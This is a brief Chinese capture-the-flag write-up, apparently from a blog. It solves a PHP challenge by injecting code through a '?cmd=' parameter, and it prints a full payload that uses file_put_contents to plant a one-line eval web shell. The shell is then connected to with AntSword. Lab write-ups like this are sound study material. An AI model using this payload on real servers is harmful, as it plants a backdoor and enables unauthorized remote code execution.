题目

查看源代码获得提示:?cmd=

发送请求试试
url/?cmd=phpinfo();

禁用的参数有点多问题不大,蚁剑启动!!!
嘎!启动失败,话说这个错爆的我一脸懵逼。怎么可能不是linux系统


继续分析file_put_contents没有禁用,创建一个一句话木马文件试试
url/?cmd=file_put_contents('1.php','<?php @eval($_POST[cmd]);?>');
蚁剑再次启动!!!
启动成功



拿到flag,都说web安全的尽头是二进制安全我觉得没毛病。
做完这题我去看其他师傅是用glob函数做出了的,下去我去试了一下,我感觉师傅真的太骚了。
本文讲述了在Linux环境下,黑客尝试通过禁用部分参数启动蚁剑,遇到失败后利用file_put_contents函数创建一句话木马并成功启动。作者探讨了Web安全中的命令注入,并对glob函数的应用表示赞赏。
560

被折叠的 条评论
为什么被折叠?



